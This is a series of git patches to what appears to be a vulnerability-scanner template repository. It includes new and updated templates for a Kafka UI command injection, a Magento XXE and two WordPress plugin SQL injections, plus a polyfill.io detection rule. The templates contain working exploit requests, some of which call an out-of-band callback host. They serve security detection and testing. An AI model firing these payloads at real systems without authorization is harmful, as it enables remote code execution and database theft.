http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 http/cves/2020/CVE-2020-27467.yaml:76b7fca1d3b0ad29b931134a22af2e4d4397cdb0 http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:ff9a77d2c9dac8bf8f11c587ece6345cf9e10a2a +http/cves/2020/CVE-2020-27838.yaml:9118e7ed48a843d2446e4b9e81c272ebc4f6682e http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 http/cves/2020/CVE-2020-27982.yaml:7b9d9d3713e2acf86c532a6b9db417367ef24d89 http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 @@ -8573,12 +8573,12 @@ javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 javascript/enumeration/mysql/mysql-show-variables.yaml:df67667eff109ba3b7c7a6062f98ae1065b0fc53 javascript/enumeration/mysql/mysql-user-enum.yaml:58f73167aa8a07b54694c8e2e78c608e6d666de5 -javascript/enumeration/pgsql/pgsql-default-db.yaml:a982b1edf4fc47cfd388e6957f60e244a1103f2f -javascript/enumeration/pgsql/pgsql-file-read.yaml:2d44baf3ef320482632da3ce686ee5c1801dd3b9 -javascript/enumeration/pgsql/pgsql-list-database.yaml:da4f3d6319890e9719d9f566a62c721745f5209f -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:7c26ad0443d18820a6ac98a8f70218d4e557c3a6 -javascript/enumeration/pgsql/pgsql-list-users.yaml:ac49221a5ef9bc515655f7d42892d37ede27c6b3 -javascript/enumeration/pgsql/pgsql-version-detect.yaml:db5083a51d2c67d772ec713cbdcf0fb605bac0f9 +javascript/enumeration/pgsql/pgsql-default-db.yaml:bfdb5c73b9c0c885a7b6292a154802361a4d6f66 +javascript/enumeration/pgsql/pgsql-file-read.yaml:d65ef75a6990d7314992aeac1b6d2e2df073f153 +javascript/enumeration/pgsql/pgsql-list-database.yaml:fb128c21ec8cbe65f1ef004de3ab62e6e6ae8064 +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:8bd234e6f9c512295ee2f15ad131f08f61c4d297 +javascript/enumeration/pgsql/pgsql-list-users.yaml:ac9b613388f0b078365007258e4ba2a9345aba3c +javascript/enumeration/pgsql/pgsql-version-detect.yaml:eacb2b969556ed4ea5265a2519539632aed09a05 javascript/enumeration/pop3/pop3-capabilities-enum.yaml:96878ec61ba4002050d1d7fd3cfb7f3b12aecf53 javascript/enumeration/redis/redis-info.yaml:17c3e097148f2d246110091f046a266ecbf56fba javascript/enumeration/redis/redis-require-auth.yaml:3d66c2357254969ae88da94c87b3a25817a34615 @@ -8789,7 +8789,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:58e5c2e9514824ab4a9bdc66cd2fa680c2fdf72f +templates-checksum.txt:ffbf74645acabd6996bff678b5acde787de1b0c1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 684ada86928bde302f356eeed3ca8352045e08bf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 12:21:37 +0000 Subject: [PATCH 0624/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 164 --------------------------- 1 file changed, 164 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e1b8f58982..37f01c16d6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,170 +3,6 @@ on: push: paths: - '.new-additions' - - 'cloud/aws/sns/sns-public-subscribe-access.yaml' - - 'cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml' - - 'cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml' - - 'cloud/kubernetes/deployments/k8s-default-namespace-used.yaml' - - 'cloud/kubernetes/deployments/k8s-host-ports-check.yaml' - - 'cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml' - - 'cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml' - - 'cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml' - - 'cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml' - - 'cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml' - - 'cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml' - - 'cloud/kubernetes/deployments/k8s-privileged-container.yaml' - - 'cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml' - - 'cloud/kubernetes/deployments/k8s-root-container-admission.yaml' - - 'cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml' - - 'cloud/kubernetes/kubernetes-code-env.yaml' - - 'cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml' - - 'cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml' - - 'cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml' - - 'cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml' - - 'cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml' - - 'cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml' - - 'cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml' - - 'cloud/kubernetes/pods/k8s-readonly-fs.yaml' - - 'cloud/kubernetes/pods/k8s-readonly-rootfs.yaml' - - 'cloud/kubernetes/pods/k8s-root-user-id.yaml' - - 'cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml' - - 'cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml' - - 'cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml' - - 'cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml' - - 'cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml' - - 'cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml' - - 'cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml' - - 'cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml' - - 'cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml' - - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' - - 'file/malware/hash/anthem-deeppanda-malware-hash.yaml' - - 'file/malware/hash/applejeus-malware-hash.yaml' - - 'file/malware/hash/avburner-malware-hash.yaml' - - 'file/malware/hash/backwash-malware-hash.yaml' - - 'file/malware/hash/blackenergy-driver-amdide-hash.yaml' - - 'file/malware/hash/blackenergy-driver-malware-hash.yaml' - - 'file/malware/hash/blackenergy-killdisk-malware-hash.yaml' - - 'file/malware/hash/blackenergy-ssh-malware-hash.yaml' - - 'file/malware/hash/blackenergy-vbs-malware-hash.yaml' - - 'file/malware/hash/bluelight-malware-hash.yaml' - - 'file/malware/hash/bluetermite-emdivi-malware-hash.yaml' - - 'file/malware/hash/bluetermite-emdivi-sfx-hash.yaml' - - 'file/malware/hash/charmingcypress-malware-hash.yaml' - - 'file/malware/hash/cheshirecat-malware-hash.yaml' - - 'file/malware/hash/cloudduke-malware-hash.yaml' - - 'file/malware/hash/codoso-gh0st-malware.yaml' - - 'file/malware/hash/codoso-malware-hash.yaml' - - 'file/malware/hash/codoso-pgv-malware-hash.yaml' - - 'file/malware/hash/codoso-plugx-malware-hash.yaml' - - 'file/malware/hash/disgomoji-malware-hash.yaml' - - 'file/malware/hash/dubnium-malware-hash.yaml' - - 'file/malware/hash/dubnium-sshopenssl-malware-hash.yaml' - - 'file/malware/hash/emissary-malware-hash.yaml' - - 'file/malware/hash/evilbamboo-malware-hash.yaml' - - 'file/malware/hash/fakem-malware-hash.yaml' - - 'file/malware/hash/flipflop-malware-hash.yaml' - - 'file/malware/hash/furtim-malware-hash.yaml' - - 'file/malware/hash/gimmick-malware-hash.yaml' - - 'file/malware/hash/godzilla-webshell-hash.yaml' - - 'file/malware/hash/greenbug-malware-hash.yaml' - - 'file/malware/hash/ico-malware-hash.yaml' - - 'file/malware/hash/industroyer-malware-hash.yaml' - - 'file/malware/hash/ironPanda-htran-malware-hash.yaml' - - 'file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml' - - 'file/malware/hash/ironpanda-malware-hash.yaml' - - 'file/malware/hash/locky-ransomware-hash.yaml' - - 'file/malware/hash/minidionis-readerview-malware-hash.yaml' - - 'file/malware/hash/minidionis-vbs-malware-hash.yaml' - - 'file/malware/hash/naikon-apt-malware-hash.yaml' - - 'file/malware/hash/neuron2-malware-hash.yaml' - - 'file/malware/hash/oilrig-malware-hash.yaml' - - 'file/malware/hash/passcv-ntscan-malware-hash.yaml' - - 'file/malware/hash/passcv-sabre-malware-hash.yaml' - - 'file/malware/hash/passcv-signingcert-malware-hash.yaml' - - 'file/malware/hash/petya-ransomware-hash.yaml' - - 'file/malware/hash/poseidongroup-maldoc-malware-hash.yaml' - - 'file/malware/hash/poseidongroup-malware-hash.yaml' - - 'file/malware/hash/powerstar-malware-hash.yaml' - - 'file/malware/hash/purplewave-malware-hash.yaml' - - 'file/malware/hash/red-leaves-malware-hash.yaml' - - 'file/malware/hash/regeorg-webshell-hash.yaml' - - 'file/malware/hash/revil-ransomware-hash.yaml' - - 'file/malware/hash/rokrat-malware-hash.yaml' - - 'file/malware/hash/sauron-malware-hash.yaml' - - 'file/malware/hash/seaduke-malware-hash.yaml' - - 'file/malware/hash/sfx1-malware-hash.yaml' - - 'file/malware/hash/sfxrar-acrotray-malware-hash.yaml' - - 'file/malware/hash/sharpext-malware-hash.yaml' - - 'file/malware/hash/sofacy-Winexe-malware-hash.yaml' - - 'file/malware/hash/sofacy-bundestag-malware-hash.yaml' - - 'file/malware/hash/sofacy-fybis-malware-hash.yaml' - - 'file/malware/hash/tidepool-malware-hash.yaml' - - 'file/malware/hash/turla-malware-hash.yaml' - - 'file/malware/hash/unit78020-malware-hash.yaml' - - 'file/malware/hash/upstyle-malware-hash.yaml' - - 'file/malware/hash/wildneutron-malware-hash.yaml' - - 'http/cves/2021/CVE-2021-38146.yaml' - - 'http/cves/2021/CVE-2021-38147.yaml' - - 'http/cves/2021/CVE-2021-43831.yaml' - - 'http/cves/2021/CVE-2021-4436.yaml' - - 'http/cves/2023/CVE-2023-32068.yaml' - - 'http/cves/2023/CVE-2023-37645.yaml' - - 'http/cves/2023/CVE-2023-38194.yaml' - - 'http/cves/2023/CVE-2023-43472.yaml' - - 'http/cves/2023/CVE-2023-45136.yaml' - - 'http/cves/2023/CVE-2023-46732.yaml' - - 'http/cves/2023/CVE-2023-48241.yaml' - - 'http/cves/2023/CVE-2023-50719.yaml' - - 'http/cves/2023/CVE-2023-50720.yaml' - - 'http/cves/2023/CVE-2023-51449.yaml' - - 'http/cves/2023/CVE-2023-6505.yaml' - - 'http/cves/2023/CVE-2023-6786.yaml' - - 'http/cves/2024/CVE-2024-0250.yaml' - - 'http/cves/2024/CVE-2024-0939.yaml' - - 'http/cves/2024/CVE-2024-1728.yaml' - - 'http/cves/2024/CVE-2024-21650.yaml' - - 'http/cves/2024/CVE-2024-23692.yaml' - - 'http/cves/2024/CVE-2024-24112.yaml' - - 'http/cves/2024/CVE-2024-24565.yaml' - - 'http/cves/2024/CVE-2024-2621.yaml' - - 'http/cves/2024/CVE-2024-27718.yaml' - - 'http/cves/2024/CVE-2024-28995.yaml' - - 'http/cves/2024/CVE-2024-29824.yaml' - - 'http/cves/2024/CVE-2024-29895.yaml' - - 'http/cves/2024/CVE-2024-29973.yaml' - - 'http/cves/2024/CVE-2024-31750.yaml' - - 'http/cves/2024/CVE-2024-31982.yaml' - - 'http/cves/2024/CVE-2024-32113.yaml' - - 'http/cves/2024/CVE-2024-3274.yaml' - - 'http/cves/2024/CVE-2024-34982.yaml' - - 'http/cves/2024/CVE-2024-3552.yaml' - - 'http/cves/2024/CVE-2024-36412.yaml' - - 'http/cves/2024/CVE-2024-36527.yaml' - - 'http/cves/2024/CVE-2024-36837.yaml' - - 'http/cves/2024/CVE-2024-37393.yaml' - - 'http/cves/2024/CVE-2024-3922.yaml' - - 'http/cves/2024/CVE-2024-4443.yaml' - - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' - - 'http/exposed-panels/lorex-panel.yaml' - - 'http/exposed-panels/oracle-application-server-panel.yaml' - - 'http/exposed-panels/trellix-panel.yaml' - - 'http/exposed-panels/turnkey-lamp-panel.yaml' - - 'http/exposed-panels/veeam-backup-manager-login.yaml' - - 'http/exposed-panels/wildix-collaboration-panel.yaml' - - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - - 'http/misconfiguration/cookies-without-secure.yaml' - - 'http/technologies/apache-allura-detect.yaml' - - 'http/technologies/nperf-server-detect.yaml' - - 'http/technologies/wordpress/plugins/copy-delete-posts.yaml' - - 'http/technologies/wordpress/plugins/image-optimization.yaml' - - 'http/technologies/wordpress/plugins/royal-elementor-addons.yaml' - - 'http/technologies/wordpress/plugins/simple-history.yaml' - - 'http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml' - - 'http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml' - - 'http/vulnerabilities/gradio/gradio-lfi.yaml' - - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' - - 'http/vulnerabilities/other/fastadmin-lfi.yaml' - - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 6b26c63d8f63b2a812a478f14c4c098b485d54b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 12:22:39 +0000 Subject: [PATCH 0625/1841] Auto Template Signing [Tue Jun 25 12:22:39 UTC 2024] :robot: --- http/cves/2020/CVE-2020-27838.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 91127651bc..32fa765dea 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201f345884c58dfcc695f374343e8a6e73f1e09258898a3ce7c24bcb6843f171a6022100eccc64ea1c2904bd250a915b963379a89c34634b0c0dfb065bd5de23d1e82342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075a12abb8d7c57a24c8ad7a00997a9a572da21c9e1131e500c6f77f352c3c557022100f4c157e6b030a4dd3fee892c2c6132443e51a8d9757b37b0147225053d401422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5646593f6b4d02341102228047baaa3dd8c9b39c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 18:49:49 +0530 Subject: [PATCH 0626/1841] minor update --- http/cves/2023/CVE-2023-52251.yaml | 77 +++++++++++++++--------------- 1 file changed, 39 insertions(+), 38 deletions(-) diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 69b2c27b26..7a5f291d61 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -2,22 +2,21 @@ id: CVE-2023-52251 info: name: Kafka UI 0.7.1 Command Injection - author: yhy0 + author: yhy0,iamnoooob severity: high description: | An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. reference: - - https://github.com/BobTheShoplifter/CVE-2023-52251-POC - - https://github.com/provectus/kafka-ui - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html + - https://github.com/BobTheShoplifter/CVE-2023-52251-POC - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-52251 cwe-id: CWE-94 - epss-score: 0.02881 - epss-percentile: 0.90497 + epss-score: 0.03218 + epss-percentile: 0.91206 cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:* metadata: verified: true @@ -26,45 +25,47 @@ info: product: ui framework: kafka fofa-query: icon_hash="-1477045616" - tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui + tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm http: - - method: GET - path: - - "{{BaseURL}}/api/clusters" - - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC" - - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(header, "application/json")' - - 'contains(body, "status\":\"online")' - - 'status_code == 200' - condition: and - - - type: dsl - dsl: - - 'contains(content_type, "application/json")' - - 'contains(body, "name")' - - "status_code == 200" - condition: and - - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" + - raw: + - | + GET /api/clusters HTTP/1.1 + Host: {{Hostname}} extractors: - type: json - name: cluster - json: - - .[0].name + name: cluster-name internal: true + json: + - '.[0].name' + - raw: + - | + GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1 + Host: {{Hostname}} + + extractors: - type: json - name: topic - json: - - .topics[0].name + name: topic-name internal: true + json: + - '.topics[].name' + + - raw: + - | + @timeout 20s + GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - 'Assigning partitions' From 9428f72a35378b4f3dc0a37117f477abc2146f87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Tue, 25 Jun 2024 15:36:55 +0200 Subject: [PATCH 0627/1841] polyfill.io detection --- http/miscellaneous/polyfill-io.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/miscellaneous/polyfill-io.yaml diff --git a/http/miscellaneous/polyfill-io.yaml b/http/miscellaneous/polyfill-io.yaml new file mode 100644 index 0000000000..d326e0bc9e --- /dev/null +++ b/http/miscellaneous/polyfill-io.yaml @@ -0,0 +1,30 @@ +id: polyfill-io-detect + +info: + name: Polyfill.io Detection + author: kazet + severity: low + description: The polyfill.io CDN was suspected to serve malware. + reference: + - https://sansec.io/research/polyfill-supply-chain-attack + - https://web.archive.org/web/20240229113710/https://github.com/polyfillpolyfill/polyfill-service/issues/2834 + - https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk + metadata: + verified: true + max-request: 1 + tags: cdn,polyfill.io + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" From 7d50cd4f0a40d883bc06a94f20d9b6d3dd930d1a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 22:45:09 +0530 Subject: [PATCH 0628/1841] Create CVE-2024-34102.yaml (Adobe Commerce & Magento - CosmicSting) --- http/cves/2024/CVE-2024-34102.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34102.yaml diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml new file mode 100644 index 0000000000..42c338e4a0 --- /dev/null +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-34102 + +info: + name: Adobe Commerce & Magento - CosmicSting + author: DhiyaneshDK + severity: critical + description: | + Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. + reference: + - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md + metadata: + fofa-query: app="Adobe-Magento" + verified: true + max-request: 1 + tags: cve,cve2024,adobe,magento,xxe + +http: + - raw: + - | + POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: word + part: body + words: + - "message" + + - type: word + part: header + words: + - "application/json" From 72dc8530d490338725c6be8cafd305a0389f3542 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 25 Jun 2024 23:53:24 +0300 Subject: [PATCH 0629/1841] add cve-2024-32709 --- http/cves/2024/CVE-2024-32709.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32709.yaml diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml new file mode 100644 index 0000000000..8db967382e --- /dev/null +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-32709 + +info: + name: WP-Recall <= 16.26.5 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 16.26.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32709 + - https://github.com/truonghuuphuc/CVE-2024-32709-Poc + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L + cvss-score: 9.3 + cve-id: CVE-2024-32709 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: cve,cve2024,wp-plugin,wp-recall +variables: + num: "999999999" + +http: + - raw: + - | + GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 From 71e274bb81fb6d70a1560efca7e7b5dcd2923da4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 26 Jun 2024 02:32:39 +0530 Subject: [PATCH 0630/1841] minor-update --- http/cves/2024/CVE-2024-32709.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 8db967382e..f3654aa060 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -10,6 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32709 - https://github.com/truonghuuphuc/CVE-2024-32709-Poc + - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 @@ -17,7 +18,12 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.0866 - tags: cve,cve2024,wp-plugin,wp-recall + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/wp-recall/" + tags: cve,cve2024,wp-plugin,wp-recall,wordpress + variables: num: "999999999" From 5df2dc73e561dc93ef7ab49dab554cb4df2a1b36 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 26 Jun 2024 00:46:02 +0300 Subject: [PATCH 0631/1841] add cve-2024-6028 --- http/cves/2024/CVE-2024-6028.yaml | 36 +++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6028.yaml diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml new file mode 100644 index 0000000000..f999194761 --- /dev/null +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-6028 + +info: + name: Quiz Maker <= 6.5.8.3 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 6.5.8.4 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6028 + - https://github.com/truonghuuphuc/CVE-2024-6028-Poc + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/quiz-maker/" + tags: cve,cve2024,wp-plugin,quiz-maker + +http: + - raw: + - | + @timeout: 45s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: 114 + + ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,4,0)]=&action=ays_finish_quiz + + matchers: + - type: dsl + dsl: + - 'duration>=4' + - 'status_code == 200' + - 'contains_all(body,"status","scoreMessage","displayScore")' + condition: and From 2fb9f55b3639743dad91906f534b5f8aba975bd8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 26 Jun 2024 00:19:12 +0000 Subject: [PATCH 0632/1841] Auto WordPress Plugins Update [Wed Jun 26 00:19:12 UTC 2024] :robot: --- helpers/wordpress/plugins/coblocks.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt | 2 +- helpers/wordpress/plugins/wps-hide-login.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 2 -- http/technologies/wordpress/plugins/add-to-any.yaml | 2 -- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 -- .../wordpress/plugins/advanced-custom-fields.yaml | 2 -- http/technologies/wordpress/plugins/akismet.yaml | 2 -- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 -- .../wordpress/plugins/all-in-one-wp-migration.yaml | 2 -- .../plugins/all-in-one-wp-security-and-firewall.yaml | 2 -- http/technologies/wordpress/plugins/amp.yaml | 2 -- http/technologies/wordpress/plugins/antispam-bee.yaml | 2 -- http/technologies/wordpress/plugins/astra-sites.yaml | 2 -- http/technologies/wordpress/plugins/autoptimize.yaml | 2 -- http/technologies/wordpress/plugins/backwpup.yaml | 2 -- .../technologies/wordpress/plugins/better-search-replace.yaml | 2 -- http/technologies/wordpress/plugins/better-wp-security.yaml | 2 -- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 -- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 -- http/technologies/wordpress/plugins/breeze.yaml | 2 -- http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 -- .../wordpress/plugins/child-theme-configurator.yaml | 2 -- http/technologies/wordpress/plugins/classic-editor.yaml | 2 -- http/technologies/wordpress/plugins/classic-widgets.yaml | 2 -- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 -- http/technologies/wordpress/plugins/cmb2.yaml | 2 -- http/technologies/wordpress/plugins/coblocks.yaml | 2 -- http/technologies/wordpress/plugins/code-snippets.yaml | 2 -- http/technologies/wordpress/plugins/coming-soon.yaml | 2 -- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 -- .../wordpress/plugins/contact-form-7-honeypot.yaml | 2 -- http/technologies/wordpress/plugins/contact-form-7.yaml | 2 -- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 -- http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 -- http/technologies/wordpress/plugins/cookie-notice.yaml | 2 -- http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 -- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 